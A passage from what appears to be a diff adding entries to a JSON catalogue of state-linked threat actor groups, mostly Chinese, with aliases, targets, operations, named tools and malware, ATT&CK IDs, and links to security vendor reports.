[ + "8.t exploit document builder" + ], + "links": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/" + ], + "attck_id": null, + 
"comment": null + }, + { + "country": "china", + "names": [ + "Pale Panda" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "PlugX" + ], + "links": [ + "http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf" + ], + "attck_id": null, + "comment": "Mentioned in 2014 Crowdstrike Global Threat Intel Report pg 22" + }, + { + "country": "china", + "names": [ + "Pirate Panda", + "KeyBoys" + ], + "targets": [], + "operations": [], + "description": "Southeast Asia", + "tools": [], + "links": [ + "http://www.crowdstrike.com/blog/rhetoric-foreshadows-cyber-activity-in-the-south-china-sea/", + "https://blog.rapid7.com/2013/06/07/keyboy-targeted-attacks-against-vietnam-and-india/", + "https://blogs.cisco.com/security/scope-of-keyboy-targeted-malware-attacks", + "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/the-keyboys-are-back-in-town.html", + "https://citizenlab.ca/2016/11/parliament-keyboy/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Poisonous Panda" + ], + "targets": [ + "Energy technology, G20, NGOs, Dissident Groups" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://files.sans.org/summit/Threat_Hunting_Incident_Response_Summit_2016/PDFs/Detecting-and-Responding-to-Pandas-and-Bears-Christopher-Scott-CrowdStrike-and-Wendi-Whitmore-IBM.pdf" + ], + "attck_id": null, + "comment": "Listed slide 4" + }, + { + "country": "china", + "names": [ + "Predator Panda" + ], + "targets": [ + "Southeast Asia" + ], + "operations": [], + "description": null, + "tools": [ + "PlugX" + ], + "links": [ + "http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf" + ], + "attck_id": null, + "comment": "Mentioned pg 22 & 42" + }, + { + "country": "china", + "names": [ + "Radio Panda" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [], + "attck_id": null, + "comment": null 
+ }, + { + "country": "china", + "names": [ + "Sabre Panda" + ], + "targets": [ + "Umbrella Revolution" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf" + ], + "attck_id": null, + "comment": "Listed in 2014 Global Threat Report (pg 9) - observed in Umbrella Revolution related activity (pg 28)" + }, + { + "country": "china", + "names": [ + "Spicy Panda" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf" + ], + "attck_id": null, + "comment": "Listed in 2014 Global Threat Report - no more details pg 9" + }, + { + "country": "china", + "names": [ + "BRONZE RIVERSIDE", + "Red Apollo, CVNX, POTASSIUM, Cloud Hopper, Hogfish, TA429, Cicada", + "Stone Panda", + "APT10", + "MenuPass Team" + ], + "targets": [ + "Healthcare; Pharma, Defense, Aerospace, Government, MSP, " + ], + "operations": [ + "Dust Storm", + "ChessMaster", + "Cloud Hopper" + ], + "description": "Data exfil over common TCP services (RDP, HTTPS)", + "tools": [ + "Quasar", + "Trochilus", + "UPPERCUT (aka ANEL)", + "ChChes", + "RedLeaves", + "CobaltStrike", + "StoneNetLoader", + "PlugX", + "IEChecker", + "EvilGrab", + "Poison Ivy" + ], + "links": [ + "https://www.crowdstrike.com/resources/reports/2019-crowdstrike-global-threat-report/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-china-ngo-government-attacks", + "http://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem", + "https://www.cylance.com/hubfs/2015_cylance_website/assets/operation-dust-storm/Op_Dust_Storm_Report.pdf", + "https://www.pwc.co.uk/issues/cyber-security-data-privacy/insights/operation-cloud-hopper.html", + "https://www.lac.co.jp/lacwatch/people/20180521_001638.html", + 
"https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-poison-ivy.pdf", + "http://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-cyber-espionage-campaign/", + "https://blog.ensilo.com/uncovering-new-activity-by-apt10", + "https://www.us-cert.gov/ncas/alerts/TA17-117A", + "https://www.fireeye.com/blog/threat-research/2018/09/apt10-targeting-japanese-corporations-using-updated-ttps.html", + "https://threatpost.com/poison-ivy-rat-spotted-in-three-new-attacks/102022/", + "http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/", + "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf", + "https://www.isightpartners.com/2016/02/threatscape-media-highlights-update-week-february-24th/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/cicada-apt10-japan-espionage" + ], + "attck_id": "G0045", + "comment": "Profile slide 13 & 14" + }, + { + "country": "china", + "names": [ + "admin@338", + "338 Team", + "Temper Panda", + "Admin338", + "Team338" + ], + "targets": [ + "Target Gov + Military, DIB, Finiancial/Think Tanks, Telco, Academia, Religious organisations" + ], + "operations": [ + "admin@338" + ], + "description": null, + "tools": [ + "LOWBALL", + "BUBBLEWRAP", + "Poison Ivy", + "jRat" + ], + "links": [ + "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", + "https://www.fireeye.com/blog/threat-research/2013/10/know-your-enemy-tracking-a-rapidly-evolving-apt-actor.html" + ], + "attck_id": null, + "comment": "\u00e2\u0080\u009cPdPD\u00e2\u0080\u009d (50 64 50 44) marker for encrypted binaries" + }, + { + "country": "china", + "names": [ + "Test Panda" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://www.slideshare.net/CrowdStrike/crowd-casts-monthly-you-have-an-adversary-problem" + ], + 
"attck_id": null, + "comment": "Listed slide 8" + }, + { + "country": "china", + "names": [ + "Toxic Panda" + ], + "targets": [ + "Dissident Groups" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://files.sans.org/summit/Threat_Hunting_Incident_Response_Summit_2016/PDFs/Detecting-and-Responding-to-Pandas-and-Bears-Christopher-Scott-CrowdStrike-and-Wendi-Whitmore-IBM.pdf" + ], + "attck_id": null, + "comment": "Listed slide 4" + }, + { + "country": "china", + "names": [ + "Twisted Panda" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://research.checkpoint.com/2022/twisted-panda-chinese-apt-espionage-operation-against-russians-state-owned-defense-institutes/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Union Panda" + ], + "targets": [ + "Industrial companies" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://files.sans.org/summit/Threat_Hunting_Incident_Response_Summit_2016/PDFs/Detecting-and-Responding-to-Pandas-and-Bears-Christopher-Scott-CrowdStrike-and-Wendi-Whitmore-IBM.pdf" + ], + "attck_id": null, + "comment": "Listed slide 4" + }, + { + "country": "china", + "names": [ + "Vicious Panda" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://research.checkpoint.com/2020/vicious-panda-the-covid-campaign/", + "https://securelist.com/apt-trends-report-q2-2020/97937/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "APT20", + "Covert Grove", + "APT8", + "Violin Panda" + ], + "targets": [ + "Energy, Chemical Industry, Healthcare and Pharma" + ], + "operations": [ + "th3bug", + "Wocao" + ], + "description": null, + "tools": [ + "CANDYCLOG", + "CETTRA", + "COOKIECLOG", + "Poison Ivy", + "CAKELOG" + ], + "links": [ + 
"https://www.fox-it.com/en/news/whitepapers/operation-wocao-shining-a-light-on-one-of-chinas-hidden-hacking-groups/", + "http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the_nitro_attacks.pdf", + "http://www.slideshare.net/CrowdStrike/crowdcast-monthly-operationalizing-intelligence-34141777" + ], + "attck_id": null, + "comment": "Listed slide 12" + }, + { + "country": "china", + "names": [ + "Wet Panda" + ], + "targets": [ + "Energy " + ], + "operations": [], + "description": null, + "tools": [ + "PlugX" + ], + "links": [ + "http://go.crowdstrike.com/rs/281-OBQ-266/images/ReportGlobalThreatIntelligence.pdf", + "http://www.slideshare.net/CrowdStrike/crowdcast-monthly-operationalizing-intelligence-34141777" + ], + "attck_id": null, + "comment": "Mentioned in 2014 Global Threat Report using PlugX (pg 22)" + }, + { + "country": "china", + "names": [ + "?" + ], + "targets": [ + "Tibetans, Hong Kong, Taiwanese interests and human rights workers, Uyghur Interests" + ], + "operations": [], + "description": "Active", + "tools": [ + "T9000", + "Agent.XST", + "Kivars", + "Grabber", + "PlugX", + "UP007", + "Gh0StRAT", + "SLServer" + ], + "links": [ + "https://www.arbornetworks.com/blog/asert/four-element-sword-engagement/", + "https://citizenlab.org/2016/04/between-hong-kong-and-burma/", + "http://pwc.blogs.com/cyber_security_updates/2016/03/taiwant-election-targetting.html" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "?" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://web.archive.org/web/20151217200415/https://www.fidelissecurity.com/sites/default/files/FTA_1020_Fidelis_Inocnation_FINAL.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "?" 
+ ], + "targets": [ + "Afghan Government" + ], + "operations": [], + "description": "Watering Hole", + "tools": [], + "links": [ + "https://www.threatconnect.com/operation-poisoned-helmand/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "?", + "APT1?" + ], + "targets": [ + "USA" + ], + "operations": [ + "Titan Rain" + ], + "description": null, + "tools": [], + "links": [ + "https://www.zdnet.com/article/security-experts-lift-lid-on-chinese-hack-attacks/", + "http://web.archive.org/web/20081011233241/http://www.breitbart.com/news/2005/12/12/051212224756.jwmkvntb.html" + ], + "attck_id": null, + "comment": "web archive link to 12/12/2005 article about Titan Rain, ZDNet link dated 11/23/2005 is similar article" + }, + { + "country": "china", + "names": [ + "?", + "PLA Navy", + "APT4?", + "Maverick Panda", + "Sykipot" + ], + "targets": [ + "DIB (Defence Industrial Base) and other government organizations" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "http://blog.trendmicro.com/trendlabs-security-intelligence/sykipot-now-targeting-us-civil-aviation-sector-information/", + "https://www.alienvault.com/open-threat-exchange/blog/new-sykipot-developments" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Links to Skyipot, Pitty Tiger, Comment Crew, Mirage", + "Calypso" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Calypso RAT", + "Byebe", + "PlugX", + "CMStar" + ], + "links": [ + "https://www.ptsecurity.com/ww-en/analytics/calypso-apt-2019/", + "https://resources.malwarebytes.com/files/2020/04/200407-MWB-COVID-White-Paper_Final.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "KeyBoy", + "Tropic Trooper" + ], + "targets": [ + "Taiwan, High-Tech in Asia, Taiwanese Government, Fossil Fuel Provider, Taiwanese, Philippine, and Hong Kong targets, focusing on their government, healthcare, 
transportation, and high-tech industries" + ], + "operations": [], + "description": null, + "tools": [ + "PCShare", + "Yahoyah", + "Poison Ivy" + ], + "links": [ + "http://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-troopers-back-usbferry-attack-targets-air-gapped-environments/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-trooper-new-strategy/" + ], + "attck_id": "G0081", + "comment": "Group based in Xiamen, in same area as PLA Navy. Likely a navy SIGINT TRB" + }, + { + "country": "china", + "names": [ + "APT41" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "ZxShell", + "LOWKEY", + "CRACKSHOT", + "SAGEHIRE", + "TERA", + "PHOTO", + "SOGU", + "PACMAN", + "LIFEBOAT", + "GEARSHIFT", + "LATELUNCH", + "NJRAT", + "HIGHNOON", + "WIDETONE", + "TIDYELF", + "HOTCHAI", + "WINTERLOVE", + "JUMPALL", + "POISONPLUG", + "POTROAST", + "ROCKBOOT", + "SWEETCANDLE", + "XDoor", + "Xmrig" + ], + "links": [ + "https://www.fireeye.com/blog/threat-research/2019/08/game-over-detecting-and-stopping-an-apt41-operation.html", + "https://www.fireeye.com/blog/threat-research/2019/08/apt41-dual-espionage-and-cyber-crime-operation.html", + "https://www.fireeye.com/blog/threat-research/2019/10/messagetap-who-is-reading-your-text-messages.html" + ], + "attck_id": "G0096", + "comment": "Overlap with BARIUM and Winnti" + }, + { + "country": "china", + "names": [ + "Earth Empusa", + "Poison Carp" + ], + "targets": [ + "This threat actor targets smartphones associated with Tibetan and Uyghur activists for espionage purposes." 
+ ], + "operations": [], + "description": "Strategic web compromise (watering hole)", + "tools": [ + "Evil Eye", + "BeEF", + "ActionSpy", + "ScanBox" + ], + "links": [ + "https://www.volexity.com/blog/2019/09/02/digital-crackdown-large-scale-surveillance-and-exploitation-of-uyghurs/", + "https://about.fb.com/news/2021/03/taking-action-against-hackers-in-china/", + "https://googleprojectzero.blogspot.com/2019/08/a-very-deep-dive-into-ios-exploit.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/new-android-spyware-actionspy-revealed-via-phishing-attacks-from-earth-empusa/", + "https://citizenlab.ca/2019/09/poison-carp-tibetan-groups-targeted-with-1-click-mobile-exploits/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "AVIVORE" + ], + "targets": [ + "aerospace and defence industries in the UK and Europe" + ], + "operations": [], + "description": null, + "tools": [ + "Mimikatz", + "WmiExec", + "PlugX" + ], + "links": [ + "https://www.contextis.com/en/blog/avivore", + "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2019-CTI-005.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "APT-C-01", + "PoisonVine" + ], + "targets": [ + "government agencies, military individuals, research institutes, maritime agencies" + ], + "operations": [], + "description": null, + "tools": [ + "ZxShell", + "CVE-2012-0158", + "CVE-2017-8759", + "Kanbox RAT", + "CVE-2014-6352", + "Poison Ivy" + ], + "links": [ + "https://www.virusbulletin.com/virusbulletin/2019/11/vb2019-paper-vine-climbing-over-great-firewall-longterm-attack-against-china/", + "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-GuPan.pdf", + "http://blogs.360.cn/post/APT_C_01_en.html", + "https://ti.qianxin.com/uploads/2018/09/20/6f8ad451646c9eda1f75c5d31f39f668.pdf", + "https://ti.qianxin.com/blog/articles/analysis-of-apt-c-01/", + 
"https://www.netscout.com/sites/default/files/2019-02/SECR_001_EN-1901%20-%20NETSCOUT%20Threat%20Intelligence%20Report%202H%202018.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "DarkUniverse" + ], + "targets": [ + "Tibet and Uyghur activists, Syria, Iran, Afghanistan, Tanzania, Ethiopia, Sudan, Russia, Belarus and the United Arab Emirates" + ], + "operations": [], + "description": "Spearphishing w/CVE-2013-0640 weaponized PDF", + "tools": [ + "ItaDuke" + ], + "links": [ + "https://securelist.com/darkuniverse-the-mysterious-apt-framework-27/94897/", + "https://www.alienvault.com/blogs/labs-research/latest-adobe-pdf-exploit-used-to-target-uyghur-and-tibetan-activists", + "https://securelist.com/new-uyghur-and-tibetan-themed-attacks-using-pdf-exploits/35465/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Taskmasters" + ], + "targets": [ + "Military, government, telecommunication, small businesses" + ], + "operations": [], + "description": null, + "tools": [ + "Scheduled Tasks", + "RemShell", + "Eternal Blue", + "404-Input-shell" + ], + "links": [ + "https://www.ptsecurity.com/ww-en/analytics/operation-taskmasters-2019/", + "https://blog.group-ib.com/task", + "https://www.youtube.com/watch?v=XYuclHsoQO4&feature=youtu.be" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Soft Cell", + "GALLIUM" + ], + "targets": [ + "Telecom" + ], + "operations": [], + "description": null, + "tools": [ + "PsExec", + "BlackMould", + "Netcat", + "Winrar", + "QuarkBandit", + "China Chopper", + "Htran", + "NBTScan", + "PoisonIvy" + ], + "links": [ + "https://www.cybereason.com/blog/operation-soft-cell-a-worldwide-campaign-against-telecommunications-providers", + "https://www.microsoft.com/security/blog/2019/12/12/gallium-targeting-global-telecom/", + "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos" + ], + 
"attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "RANCOR" + ], + "targets": [ + "South-East Asia" + ], + "operations": [], + "description": null, + "tools": [ + "Derusbi", + "Dudell", + "DDKONG Plugin", + "KHRAT Trojan" + ], + "links": [ + "https://unit42.paloaltonetworks.com/rancor-cyber-espionage-group-uses-new-custom-malware-to-attack-southeast-asia/", + "https://meltx0r.github.io/tech/2019/09/11/rancor-apt.html", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/", + "https://research.checkpoint.com/rancor-the-year-of-the-phish/" + ], + "attck_id": "G0075", + "comment": null + }, + { + "country": "china", + "names": [ + "ChinaZ" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "Linux/UDPfker", + "Linux.BackDoor.Xnote.1", + "Linux/BillGates.Lite" + ], + "links": [ + "https://www.intezer.com/blog-chinese-apts-rising-ia-community-may-2019/", + "https://blog.malwaremustdie.org/2015/08/mmd-0039-2015-chinaz-made-new-malware.html", + "https://news.drweb.com/show/?i=9272&lng=en&c=5", + "https://blog.malwaremustdie.org/2016/10/mmd-0060-2016-linuxudpfker-and-chinaz.html", + "https://www.intezer.com/blog-chinaz-introduces-new-undetected-malware/", + "https://www.botconf.eu/wp-content/uploads/2014/12/2014-2.10-Chinese-Chicken-Multiplatform-DDoS-Botnets.pdf", + "https://www.intezer.com/blog-chinaz-relations/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Papa Bear", + "Pat/Patted Bear", + "Slap Bear", + "APT-C-37" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://mp.weixin.qq.com/s/lUtXwWjPVMHXfR6oLnXYhQ", + "https://zhuanlan.kanxue.com/article-8168.htm", + "http://blogs.360.cn/post/analysis-of-apt-c-37.html", + "https://cybersecurity.att.com/blogs/labs-research/alien-labs-2019-analysis-of-threat-groups-molerats-and-apt-c-37" 
+ ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "APT-C-27", + "Goldmouse/Gold Mouse/Gold Rat" + ], + "targets": [ + "Middle East" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://blog.360totalsecurity.com/en/the-sample-analysis-of-apt-c-27s-recent-attack/", + "https://www.pbwcz.cz/Reporty/20180723_CSE_APT27_Syria_v1.pdf", + "https://ti.360.net/blog/articles/apt-c-27-(goldmouse):-suspected-target-attack-against-the-middle-east-with-winrar-exploit-en/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Storm Cloud" + ], + "targets": [], + "operations": [ + "Holy Water" + ], + "description": "Strategic web compromise (watering hole)", + "tools": [ + "Godlike12", + "SweetAlerts" + ], + "links": [], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "TA410" + ], + "targets": [ + "utility providers across the U.S" + ], + "operations": [], + "description": null, + "tools": [ + "LookBack", + "FlowCloud" + ], + "links": [ + "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new", + "https://www.welivesecurity.com/2022/04/27/lookback-ta410-umbrella-cyberespionage-ttps-activity/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "SixLittleMonkeys", + "Microcin" + ], + "targets": [ + "Central Asia, Russian military, Belarussia, Mongolia," + ], + "operations": [], + "description": null, + "tools": [ + "BYEBY", + "Microcin", + "Mikroceen" + ], + "links": [ + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07170759/Microcin_Technical_4PDF_eng_final_s.pdf", + "https://securelist.com/apt-trends-report-q2-2019/91897/", + "https://www.welivesecurity.com/2020/05/14/mikroceen-spying-backdoor-high-profile-networks-central-asia/", + "https://securelist.com/microcin-is-here/97353/", + 
"https://securelist.com/steganography-in-contemporary-cyberattacks/79276/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "UNC2640", + "UNC2639", + "Ant", + "HAFNIUM", + "UNC2643" + ], + "targets": [ + "Microsoft Exchange Server" + ], + "operations": [ + "Operation Exchange Marauder" + ], + "description": null, + "tools": [ + "Covenant", + "7-Zip", + "PowerCat", + "Procdump", + "Nishang" + ], + "links": [ + "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/", + "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/microsoft-exchange-server-protection" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Luminous Moth" + ], + "targets": [ + "South East Asia" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://securelist.com/apt-luminousmoth/103332/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Spiral" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "SolarWinds Orion API (CVE-2020-10148)", + "SUPERNOVA" + ], + "links": [ + "https://www.secureworks.com/blog/supernova-web-shell-deployment-linked-to-spiral-threat-group" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Sparkling Goblin" + ], + "targets": [ + "Academic sectors in Macao, Hong Kong and Taiwan, A religious organization in Taiwan, A computer and electronics manufacturer in Taiwan, Government organizations in Southeast Asia, An e-commerce platform in South Korea, The education sector in Canada, 
Media companies in India, Bahrain, and the USA, A computer retail company based in the USA, Local government in the country of Georgia, Unidentified organizations in South Korea and Singapore, " + ], + "operations": [], + "description": null, + "tools": [ + "SideWalk", + "CROSSWALK" + ], + "links": [ + "https://www.welivesecurity.com/2021/08/24/sidewalk-may-be-as-dangerous-as-crosswalk/", + "https://documents.trendmicro.com/assets/white_papers/wp-earth-baku-an-apt-group-targeting-indo-pacific-countries.pdf" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "BRONZE FLEETWOOD", + "APT5" + ], + "targets": [ + "Regional telecommunication providers, Asia-based employees of global telecommunications and tech firms, high-tech manufacturing, and military application technology." + ], + "operations": [], + "description": null, + "tools": [ + "TABCTENG", + "SHORTLEASH", + "HAZELNUT", + "LEOUNCIA", + "FULLSILO", + "DIRTYWORD", + "FREESWIM", + "PULLTAB", + "DANCEPARTY", + "HELLOTHEWORLD", + "HALFBACK", + "HIREDHELP", + "AURIGA", + "CYFREE", + "COOLWHIP", + "SHINYFUR", + "HAPPYSAD", + "SWEETCOLA", + "BIRDWORLD", + "TIGHTROPE", + "Poison Ivy", + "BRIGHTCYAN", + "BRIGHTCREST", + "ENCORE", + "GIF89A", + "BRIGHTCOMB", + "PUSHBACK", + "KEYFANG", + "SPIRITBOX", + "CLEANACT", + "PALEJAB", + "WINVAULT", + "LOWBID", + "PITCHFORK", + "TRUCKBED", + "NEDDYHORSE", + "SCREENBIND", + "WIDERIM", + "FARCRY" + ], + "links": [ + "https://www.fireeye.com/current-threats/apt-groups.html", + "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html", + "https://www.bloomberg.com/news/features/2021-09-02/juniper-mystery-attacks-traced-to-pentagon-role-and-chinese-hackers" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "RedFoxtrot " + ], + "targets": [ + "South Asia Telecom & Defense" + ], + "operations": [], + "description": null, + "tools": [ + 
"ShadowPad", + "PlugX-Talisman", + "GUNTERS" + ], + "links": [ + "https://go.recordedfuture.com/redfoxtrot-insikt-report", + "https://www.recordedfuture.com/chinese-apt-groups-target-afghan-telecommunications-firm/", + "https://www.recordedfuture.com/redfoxtrot-china-pla-targets-bordering-asian-countries/", + "https://www.sentinelone.com/labs/moshen-dragons-triad-and-error-approach-abusing-security-software-to-sideload-plugx-and-shadowpad/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "IronHusky" + ], + "targets": [], + "operations": [], + "description": null, + "tools": [ + "MysterySnail", + "CVE-2021-40449" + ], + "links": [ + "https://securelist.com/apt-trends-report-q1-2018/85280/https://securelist.com/apt-trends-report-q1-2018/85280/", + "https://securelist.com/apt-trends-report-q2-2020/97937/", + "https://securelist.com/mysterysnail-attacks-with-windows-zero-day/104509/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Antlion" + ], + "targets": [ + "Financial Services in ROC (Taiwan)" + ], + "operations": [], + "description": null, + "tools": [ + "Xpack", + "EHAGBPSL", + "JpgRun", + "NetSessionEnum" + ], + "links": [ + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/china-apt-antlion-taiwan-financial-attacks" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "DEV-0322" + ], + "targets": [ + "US Defense Industrial Base, higher education, consulting services, and information technology sectors" + ], + "operations": [ + "TiltedTemple" + ], + "description": "Serv-u Secure FTP, Exploit ZOHO ManageEngine ADSelfService Plus", + "tools": [], + "links": [ + "https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/", + "https://unit42.paloaltonetworks.com/manageengine-godzilla-nglite-kdcsponge/", + 
"https://unit42.paloaltonetworks.com/tiltedtemple-manageengine-servicedesk-plus/", + "https://www.microsoft.com/security/blog/2021/11/08/threat-actor-dev-0322-exploiting-zoho-manageengine-adselfservice-plus/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "china", + "names": [ + "Curious Gorge" + ], + "targets": [ + "government & military organizations in Ukraine, Russia, Kazakhstan, and Mongolia" + ], + "operations": [], + "description": null, + "tools": [], + "links": [ + "https://blog.google/threat-analysis-group/tracking-cyber-activity-eastern-europe/", + "https://blog.google/threat-analysis-group/update-on-cyber-activity-in-eastern-europe/" + ], + "attck_id": null, + "comment": "Subordinate to Strategic Support Force" + }, + { + "country": "china", + "names": [ + "Scarab" + ], + "targets": [ + "Russia, Ukraine" + ], + "operations": [], + "description": null, + "tools": [ + "", + "Trojan.Scieron", + "Scieron", + "Trojan.Scieron.B" + ], + "links": [ + "https://community.broadcom.com/symantecenterprise/communities/community-home/librarydocuments/viewdocument?DocumentKey=8bfa7311-fdd9-4f8d-b813-1ab6c9d2c363&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=librarydocuments", + "https://www.sentinelone.com/labs/chinese-threat-actor-scarab-targeting-ukraine/", + "https://research.checkpoint.com/2022/state-sponsored-attack-groups-capitalise-on-russia-ukraine-war-for-cyber-espionage/", + "https://cert.gov.ua/article/38097", + "https://otx.alienvault.com/pulse/54c7e1e811d4085eb82e0598/" + ], + "attck_id": null, + "comment": null + }, + { + "country": "russia", + "names": [ + "TG-4127", + "SNAKEMACKEREL", + "APT28", + "Grizzly Steppe", + "Pawn Storm", + "Sednit", + "Strontium", + "Swallowtail", + "Sofacy", + "IRON TWILIGHT", + "Tsar Team", + "SIG40", + "Fancy Bear", + "Group 74" + ], + "targets": [ + "United States government" + ], + "operations": [ + "OpOlympics", + " Russian Doll", + "DNC Hack", + "Burisma", + "Bundestag", + "TV5 Monde \"Cyber 
Caliphate\"", + "EFF Attack" + ], + "description": null, + "tools": [ + "Sednit", + "LoJax", + "OLDBAIT", + "CORESHELL", + "Foozer", + "SeduUploader", + "Komplex", + "SOURFACE", + "XAgent", + "DealersChoice", + "Sedkit", + "XTunnel", + "Sedreco Dropper", + "CHOPSTICK", + "Winexe", + "Downdelph", + "DownRange", + "WinIDS", + "USBStealer", + "Sofacy", + "HideDrv (Rootkit)" + ], + "links": [ + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/", + "https://apnews.com/3bca5267d4544508bb523fa0db462cb2?utm_campaign=SocialFlow&utm_source=Twitter&utm_medium=AP", + "https://netzpolitik.org/2015/digital-attack-on-german-parliament-investigative-report-on-the-hack-of-the-left-party-infrastructure-in-bundestag/", + "https://aptnotes.malwareconfig.com/web/viewer.html?file=../APTnotes/2014/apt28.pdf", + "https://www.crowdstrike.com/blog/danger-close-fancy-bear-tracking-ukrainian-field-artillery-units/", + "https://www.welivesecurity.com/2018/09/27/lojax-first-uefi-rootkit-found-wild-courtesy-sednit-group/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/update-pawn-storm-new-targets-politically-motivated-campaigns/", + "http://blog.talosintelligence.com/2017/10/cyber-conflict-decoy-document.html", + "https://securelist.com/a-slice-of-2017-sofacy-activity/83930/", + "http://www.welivesecurity.com/2016/10/20/new-eset-research-paper-puts-sednit-under-the-microscope/", + "https://www.bloomberg.com/news/articles/2022-03-07/hackers-targeted-u-s-lng-producers-in-run-up-to-war-in-ukraine?sref=ExbtjcSG", + "http://researchcenter.paloaltonetworks.com/2016/06/unit42-new-sofacy-attacks-against-us-government-agency/", + "https://cybergeeks.tech/skinnyboy-apt28/", + "https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/", + "https://securelist.com/masha-and-these-bears/84311/", + 